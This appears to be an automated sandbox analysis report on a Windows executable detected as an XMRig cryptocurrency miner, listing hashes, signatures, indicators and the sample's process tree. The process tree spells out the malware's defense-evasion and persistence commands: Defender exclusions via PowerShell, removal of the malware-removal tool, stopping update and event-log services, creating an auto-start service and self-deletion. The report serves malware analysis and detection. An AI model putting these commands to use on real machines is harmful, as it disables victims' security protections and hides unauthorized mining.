Analysis
-
max time kernel
101s -
max time network
90s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22-12-2024 13:14
Static task
static1
Behavioral task
behavioral1
Sample
bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe
Resource
win7-20241010-en
General
-
Target
bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe
-
Size
5.6MB
-
MD5
ccd48feb1cadeb18b22a35e28d25bea6
-
SHA1
13933c53295c55f9465890ced03f0bd1954b0488
-
SHA256
bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a
-
SHA512
9af808e8e9ad55429e50a74e6924e0302fb7fa6ac469c4a15625f32fb309047552aaaccf490fc706f6ce450afd762a7d6e42a01207a1c2d92cbfe31cc8babf5b
-
SSDEEP
98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7W:xFKoU8O5/b2XViSjX310SeyGc7u7W
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2140-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2140-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2296 powershell.exe 2172 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1580 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 464 Process not Found 2320 lutlgidagtja.exe -
Loads dropped DLL 1 IoCs
pid Process 464 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2588 powercfg.exe 2596 powercfg.exe 2440 powercfg.exe 2908 powercfg.exe 1524 powercfg.exe 1728 powercfg.exe 2228 powercfg.exe 2532 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe lutlgidagtja.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2320 set thread context of 2076 2320 lutlgidagtja.exe 83 PID 2320 set thread context of 2140 2320 lutlgidagtja.exe 88 -
resource yara_rule behavioral1/memory/2140-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2140-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1768 sc.exe 2148 sc.exe 2904 sc.exe 832 sc.exe 2152 sc.exe 1312 sc.exe 1996 sc.exe 2264 sc.exe 2112 sc.exe 1804 sc.exe 2756 sc.exe 3004 sc.exe 2732 sc.exe 2252 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80d80d7c7354db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 2296 powershell.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 392 bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe 2320 lutlgidagtja.exe 2172 powershell.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2320 lutlgidagtja.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe 2140 nslookup.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 2296 powershell.exe Token: SeShutdownPrivilege 2440 powercfg.exe Token: SeShutdownPrivilege 2596 powercfg.exe Token: SeShutdownPrivilege 2532 powercfg.exe Token: SeShutdownPrivilege 2588 powercfg.exe Token: SeDebugPrivilege 2172 powershell.exe Token: SeShutdownPrivilege 2228 powercfg.exe Token: SeShutdownPrivilege 1728 powercfg.exe Token: SeShutdownPrivilege 2908 powercfg.exe Token: SeShutdownPrivilege 1524 powercfg.exe Token: SeLockMemoryPrivilege 2140 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2456 wrote to memory of 1720 2456 cmd.exe 37 PID 2456 wrote to memory of 1720 2456 cmd.exe 37 PID 2456 wrote to memory of 1720 2456 cmd.exe 37 PID 1580 wrote to memory of 2956 1580 cmd.exe 62 PID 1580 wrote to memory of 2956 1580 cmd.exe 62 PID 1580 wrote to memory of 2956 1580 cmd.exe 62 PID 2972 wrote to memory of 1200 2972 cmd.exe 70 PID 2972 wrote to memory of 1200 2972 cmd.exe 70 PID 2972 wrote to memory of 1200 2972 cmd.exe 70 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2076 2320 lutlgidagtja.exe 83 PID 2320 wrote to memory of 2140 2320 lutlgidagtja.exe 88 PID 2320 wrote to memory of 2140 2320 lutlgidagtja.exe 88 PID 2320 wrote to memory of 2140 2320 lutlgidagtja.exe 88 PID 2320 wrote to memory of 2140 2320 lutlgidagtja.exe 88 PID 2320 wrote to memory of 2140 2320 lutlgidagtja.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe"C:\Users\Admin\AppData\Local\Temp\bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:392 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1720
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2904
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2756
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JIOGRCSG"2⤵
- Launches sc.exe
PID:2264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"2⤵
- Launches sc.exe
PID:2252
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:832
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JIOGRCSG"2⤵
- Launches sc.exe
PID:2112
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2956
-
-
-
C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exeC:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1200
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2152
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:1312
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1996
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1804
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1768
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1524
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2076
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5ccd48feb1cadeb18b22a35e28d25bea6
SHA113933c53295c55f9465890ced03f0bd1954b0488
SHA256bc19f23f50864e82405741101d232242fa067ae54d1f3619115563f46d8d8c6a
SHA5129af808e8e9ad55429e50a74e6924e0302fb7fa6ac469c4a15625f32fb309047552aaaccf490fc706f6ce450afd762a7d6e42a01207a1c2d92cbfe31cc8babf5b